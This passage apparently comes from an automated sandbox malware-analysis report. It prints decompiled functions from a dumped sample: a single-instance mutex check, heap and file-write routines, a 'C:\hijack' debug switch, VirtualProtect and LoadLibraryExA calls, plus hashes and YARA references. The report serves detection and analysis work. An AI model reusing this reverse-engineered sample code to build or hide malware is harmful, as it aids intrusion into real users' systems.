                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: O}B
                                                                                                                                                                  • API String ID: 0-2261005544
                                                                                                                                                                  • Opcode ID: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                                  • Instruction ID: e43efc7cca98cce1374ca7afc4db8c379560fc5196792797f74943b4e309f07b
                                                                                                                                                                  • Opcode Fuzzy Hash: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                                  • Instruction Fuzzy Hash: CC612CB4F04219EFCB04CF94D885AAEBBB1BF48314F108199EA05AB381D774A941CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A150, Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A150(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				int _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;
				void* _t19;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_t19 = CreateMutexA( &_v40, 0, _a4); // executed
				_v28 = _t19;
				if(_v28 != 0 && GetLastError() == 0xb7) {
					_v44 = 1;
				}
				return _v44;
			}








                                                                                                                                                                  0x1001a156
                                                                                                                                                                  0x1001a15d
                                                                                                                                                                  0x1001a16a
                                                                                                                                                                  0x1001a17a
                                                                                                                                                                  0x1001a180
                                                                                                                                                                  0x1001a187
                                                                                                                                                                  0x1001a191
                                                                                                                                                                  0x1001a19e
                                                                                                                                                                  0x1001a1a4
                                                                                                                                                                  0x1001a1ab
                                                                                                                                                                  0x1001a1ba
                                                                                                                                                                  0x1001a1ba
                                                                                                                                                                  0x1001a1c7

                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A16A
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A17A
                                                                                                                                                                  • CreateMutexA.KERNELBASE(0000000C,00000000,100206C4), ref: 1001A19E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 1001A1AD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4085719312-0
                                                                                                                                                                  • Opcode ID: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
                                                                                                                                                                  • Instruction ID: 3bb7ca3d3a89cab5a40ee6ca153f8139473754825ab1ab767a0ca4e665a0d5f7
                                                                                                                                                                  • Opcode Fuzzy Hash: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
                                                                                                                                                                  • Instruction Fuzzy Hash: EC01BB71940309DFEB10DFD0C989BEDBBB4EB08315F600504EA05BA290D7B5AAC5CBA6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042827B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 004283DA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                  • String ID: $@
                                                                                                                                                                  • API String ID: 544645111-1077428164
                                                                                                                                                                  • Opcode ID: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                                  • Instruction ID: 23d1629cc5a139e14551ecf931a83ce50547ed0f6d52aeabc839bd905d874c73
                                                                                                                                                                  • Opcode Fuzzy Hash: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                                  • Instruction Fuzzy Hash: 7551F874A01619DFDB08CF88D490BEDBBF1BB88314F148259D805AB390C735A981CF94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000CEBD, Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E1000CEBD(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				void* _t2;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				void* _t30;
				void* _t32;

				_t18 = __edx;
				_t12 = HeapAlloc;
				do {
					_t32 =  *0x10335310; // 0x2c90000
					_t20 = _t30;
					if(_t32 == 0) {
						E10011F42(_t12, _t18, _t20, _t32);
						E10011DA2(0x1e);
						E10011B04(0xff);
					}
					_t1 =  *0x10337f3c;
					if(_t1 != 1) {
						__eflags = _t1 - 3;
						if(__eflags != 0) {
							L10:
							__eflags = _t30;
							if(_t30 == 0) {
								_t20 = 1;
								__eflags = 1;
							}
							_t22 = _t20 + 0x0000000f & 0xfffffff0;
							__eflags = _t22;
							_push(_t22);
							goto L13;
						} else {
							_push(_t30);
							_t2 = E1000CE60(_t12, _t20, 0, __eflags);
							__eflags = _t2;
							if(__eflags == 0) {
								goto L10;
							}
						}
					} else {
						if(_t30 == 0) {
							_t10 = 1;
							__eflags = 1;
						} else {
							_t10 = _t30;
						}
						_push(_t10);
						L13:
						_push(0);
						_t2 = RtlAllocateHeap( *0x10335310); // executed
					}
					_t28 = _t2;
					if(_t28 == 0) {
						_t24 = 0xc;
						if( *0x103357e4 == _t2) {
							 *((intOrPtr*)(E1000F780(__eflags))) = _t24;
							L19:
							 *((intOrPtr*)(E1000F780(_t37))) = _t24;
						} else {
							goto L16;
						}
					}
					return _t28;
					L16:
					_t6 = E1001092A(_t30);
					_t37 = _t6;
				} while (_t6 != 0);
				goto L19;
			}


















                                                                                                                                                                  0x1000cebd
                                                                                                                                                                  0x1000cebe
                                                                                                                                                                  0x1000cec6
                                                                                                                                                                  0x1000cec8
                                                                                                                                                                  0x1000cece
                                                                                                                                                                  0x1000ced0
                                                                                                                                                                  0x1000ced2
                                                                                                                                                                  0x1000ced9
                                                                                                                                                                  0x1000cee3
                                                                                                                                                                  0x1000cee9
                                                                                                                                                                  0x1000ceea
                                                                                                                                                                  0x1000cef2
                                                                                                                                                                  0x1000cf02
                                                                                                                                                                  0x1000cf05
                                                                                                                                                                  0x1000cf12
                                                                                                                                                                  0x1000cf12
                                                                                                                                                                  0x1000cf14
                                                                                                                                                                  0x1000cf18
                                                                                                                                                                  0x1000cf18
                                                                                                                                                                  0x1000cf18
                                                                                                                                                                  0x1000cf1c
                                                                                                                                                                  0x1000cf1c
                                                                                                                                                                  0x1000cf1f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000cf07
                                                                                                                                                                  0x1000cf07
                                                                                                                                                                  0x1000cf08
                                                                                                                                                                  0x1000cf0d
                                                                                                                                                                  0x1000cf10
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000cf10
                                                                                                                                                                  0x1000cef4
                                                                                                                                                                  0x1000cef6
                                                                                                                                                                  0x1000cefe
                                                                                                                                                                  0x1000cefe
                                                                                                                                                                  0x1000cef8
                                                                                                                                                                  0x1000cef8
                                                                                                                                                                  0x1000cef8
                                                                                                                                                                  0x1000ceff
                                                                                                                                                                  0x1000cf20
                                                                                                                                                                  0x1000cf20
                                                                                                                                                                  0x1000cf27
                                                                                                                                                                  0x1000cf27
                                                                                                                                                                  0x1000cf29
                                                                                                                                                                  0x1000cf2d
                                                                                                                                                                  0x1000cf37
                                                                                                                                                                  0x1000cf38
                                                                                                                                                                  0x1000cf4c
                                                                                                                                                                  0x1000cf4e
                                                                                                                                                                  0x1000cf53
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000cf38
                                                                                                                                                                  0x1000cf5b
                                                                                                                                                                  0x1000cf3a
                                                                                                                                                                  0x1000cf3b
                                                                                                                                                                  0x1000cf40
                                                                                                                                                                  0x1000cf42
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 1000CED2
                                                                                                                                                                    • Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F69
                                                                                                                                                                    • Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F73
                                                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 1000CED9
                                                                                                                                                                    • Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E0E
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E1F
                                                                                                                                                                    • Part of subcall function 10011DA2: GetModuleFileNameA.KERNEL32(00000000,103354E9,00000104,?,103352E0,00000000), ref: 10011E3B
                                                                                                                                                                    • Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E50
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E63
                                                                                                                                                                    • Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E6C
                                                                                                                                                                    • Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E79
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011EA6
                                                                                                                                                                    • Part of subcall function 10011B04: ___crtCorExitProcess.LIBCMT ref: 10011B08
                                                                                                                                                                    • Part of subcall function 10011B04: ExitProcess.KERNEL32 ref: 10011B12
                                                                                                                                                                    • Part of subcall function 1000CE60: ___sbh_alloc_block.LIBCMT ref: 1000CE88
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 1000CF27
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3791426274-0
                                                                                                                                                                  • Opcode ID: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
                                                                                                                                                                  • Instruction ID: e2b4030b7ffdff5dfd6972142c91b8fd57cf3792c5bc4284219116a52f4c6e3d
                                                                                                                                                                  • Opcode Fuzzy Hash: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
                                                                                                                                                                  • Instruction Fuzzy Hash: 17012B3664936F5AF221D3699C81D7A72DDDB847F0B220036F908CA19ACA60DC419192
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001FC70, Relevance: 4.5, APIs: 3, Instructions: 34fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001FC70(CHAR* _a4, void* _a8, long _a12) {
				void* _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _t12;
				int _t14;

				_v16 = 0;
				_t12 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v8 = _t12;
				_t14 = WriteFile(_v8, _a8, _a12,  &_v12, 0); // executed
				if(_t14 != 0) {
					_v16 = 1;
				}
				CloseHandle(_v8);
				return _v16;
			}








                                                                                                                                                                  0x1001fc76
                                                                                                                                                                  0x1001fc93
                                                                                                                                                                  0x1001fc99
                                                                                                                                                                  0x1001fcae
                                                                                                                                                                  0x1001fcb6
                                                                                                                                                                  0x1001fcb8
                                                                                                                                                                  0x1001fcb8
                                                                                                                                                                  0x1001fcc3
                                                                                                                                                                  0x1001fccf

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileA.KERNELBASE(10027948,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC93
                                                                                                                                                                  • WriteFile.KERNELBASE(00039E00,00000000,00000000,10027948,00000000), ref: 1001FCAE
                                                                                                                                                                  • CloseHandle.KERNEL32(00039E00), ref: 1001FCC3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1065093856-0
                                                                                                                                                                  • Opcode ID: ad2f09d0c760640d3f087f917110d740d93e78ee16150dd3c08881fe94400f9c
                                                                                                                                                                  • Instruction ID: 2f4003bc1fe89f611cd7e8d3edbfbe9cee40d04c14368eec4aa65be71e9b4f80
                                                                                                                                                                  • Opcode Fuzzy Hash: ad2f09d0c760640d3f087f917110d740d93e78ee16150dd3c08881fe94400f9c
                                                                                                                                                                  • Instruction Fuzzy Hash: 57F0BD75A40208FBEB10DFD4DD85F9E77B8EB48704F208148FA14AB280DA75AA559B94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F220, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001F220() {
				int _t1;

				_t1 = PathFileExistsA("C:\\hijack"); // executed
				return _t1;
			}




                                                                                                                                                                  0x1001f228
                                                                                                                                                                  0x1001f22f

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFileExistsA.KERNELBASE(C:\hijack,?,1001F242,?,10022D49,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F228
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                  • String ID: C:\hijack
                                                                                                                                                                  • API String ID: 1174141254-148195797
                                                                                                                                                                  • Opcode ID: b4aed7142bcfa9c109a42f7cfcdeef266ad65f9a5a7ad023a92b352b605b1dd6
                                                                                                                                                                  • Instruction ID: 836d1940dc60a67217bc81a4f11f7de2e89defe1122ff9dd96729f1ae93068f2
                                                                                                                                                                  • Opcode Fuzzy Hash: b4aed7142bcfa9c109a42f7cfcdeef266ad65f9a5a7ad023a92b352b605b1dd6
                                                                                                                                                                  • Instruction Fuzzy Hash: BBA022382C020CA3800023CABC088E0BB3CC8880323820020FA0C020008F0220A000A3
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F230, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001F230(void* __edi, intOrPtr _a4, char _a8) {
				char* _v8;
				char _v70491;
				char _v70492;
				void* _t12;
				void* _t16;

				E10018B00(0x11358); // executed
				_t12 = E1001F220(); // executed
				if(_t12 != 0) {
					_v70492 = 0;
					E1000CF80(__edi,  &_v70491, 0, 0x1134f);
					_v8 =  &_a8;
					_t16 = E10001D60( &_v70492, 0x1134f, _a4, _v8);
					_v8 = 0;
					OutputDebugStringA( &_v70492);
					return _t16;
				}
				return _t12;
			}








                                                                                                                                                                  0x1001f238
                                                                                                                                                                  0x1001f23d
                                                                                                                                                                  0x1001f244
                                                                                                                                                                  0x1001f246
                                                                                                                                                                  0x1001f25b
                                                                                                                                                                  0x1001f266
                                                                                                                                                                  0x1001f27d
                                                                                                                                                                  0x1001f285
                                                                                                                                                                  0x1001f293
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001f293
                                                                                                                                                                  0x1001f29c

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 1001F220: PathFileExistsA.KERNELBASE(C:\hijack,?,1001F242,?,10022D49,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F228
                                                                                                                                                                  • _memset.LIBCMT ref: 1001F25B
                                                                                                                                                                    • Part of subcall function 10001D60: __vsnprintf_s.LIBCMT ref: 10001D77
                                                                                                                                                                  • OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebugExistsFileOutputPathString__vsnprintf_s_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3726070730-0
                                                                                                                                                                  • Opcode ID: 38a1c629065592f6bfd2de089b35504f17c640c29cbcd8feaed5eabe39e1a170
                                                                                                                                                                  • Instruction ID: 59963c058c004c355ade2e5f334ded41505970929f005b43d63a195b67db6380
                                                                                                                                                                  • Opcode Fuzzy Hash: 38a1c629065592f6bfd2de089b35504f17c640c29cbcd8feaed5eabe39e1a170
                                                                                                                                                                  • Instruction Fuzzy Hash: 6BF090B9900348A7DB14CBE5DC45FE9B37EDB04A04F4440C8FB189B649EA70E7848BA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000F81F, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1000F81F(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10335310 = _t6;
				if(_t6 != 0) {
					_t7 = E1000F7C4(__eflags);
					__eflags = _t7 - 3;
					 *0x10337f3c = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000FA94(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10335310);
							 *0x10335310 =  *0x10335310 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                                                                  0x1000f830
                                                                                                                                                                  0x1000f838
                                                                                                                                                                  0x1000f83d
                                                                                                                                                                  0x1000f842
                                                                                                                                                                  0x1000f847
                                                                                                                                                                  0x1000f84a
                                                                                                                                                                  0x1000f84f
                                                                                                                                                                  0x1000f875
                                                                                                                                                                  0x1000f877
                                                                                                                                                                  0x1000f878
                                                                                                                                                                  0x1000f851
                                                                                                                                                                  0x1000f856
                                                                                                                                                                  0x1000f85b
                                                                                                                                                                  0x1000f85e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000f860
                                                                                                                                                                  0x1000f866
                                                                                                                                                                  0x1000f86c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000f86c
                                                                                                                                                                  0x1000f85e
                                                                                                                                                                  0x1000f83f
                                                                                                                                                                  0x1000f83f
                                                                                                                                                                  0x1000f841
                                                                                                                                                                  0x1000f841

                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,1000EA0F,00000001), ref: 1000F830
                                                                                                                                                                  • HeapDestroy.KERNEL32 ref: 1000F866
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$CreateDestroy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3296620671-0
                                                                                                                                                                  • Opcode ID: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
                                                                                                                                                                  • Instruction ID: 18601b020fc9775d6ac859e2e5d9de66436f62596d67e2443513b26528c1d1d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
                                                                                                                                                                  • Instruction Fuzzy Hash: 0DE06574628312ABF700EB314C897A535D8E7807D2F21483DF404C84E5FFA0C640A741
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004284CB, Relevance: 1.6, APIs: 1, Instructions: 113libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00428532
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                  • Opcode ID: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
                                                                                                                                                                  • Instruction ID: ef7ca6d443df36ec8b89651c04e473b2a384ca014817e2868d41c5fb65919ee0
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
                                                                                                                                                                  • Instruction Fuzzy Hash: 2551C974E0121ADFDB04CF88D890BAEB7B1FF48304F648599D515AB391C734A991CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A3A8, Relevance: 1.5, APIs: 1, Instructions: 8registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A3A8() {
				intOrPtr _t4;
				void* _t6;

				RegCloseKey( *(_t6 - 4)); // executed
				_t4 =  *((intOrPtr*)(_t6 - 8));
				return _t4;
			}





                                                                                                                                                                  0x1001a3b5
                                                                                                                                                                  0x1001a3bb
                                                                                                                                                                  0x1001a3c1

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.KERNELBASE(00000000), ref: 1001A3B5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                  • Opcode ID: 4a63e03739b60fead9fdaeed387a206de6423b00f649f4b4298aa4d1403a3e1c
                                                                                                                                                                  • Instruction ID: facc41993b3c1af09304e29cf976f720d8779abb0dabb2bdd366089c3a2d3d5b
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a63e03739b60fead9fdaeed387a206de6423b00f649f4b4298aa4d1403a3e1c
                                                                                                                                                                  • Instruction Fuzzy Hash: 97B09239A00208ABCB24CB90D98496CB7B5EB49211B2002C8FE0957300CA329E909B90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019710, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019710() {
				intOrPtr _t2;

				EnumWindows(E10019430, 0);
				_t2 =  *0x10335dcc; // 0x0
				return _t2;
			}




                                                                                                                                                                  0x1001971a
                                                                                                                                                                  0x10019720
                                                                                                                                                                  0x10019726

                                                                                                                                                                  APIs
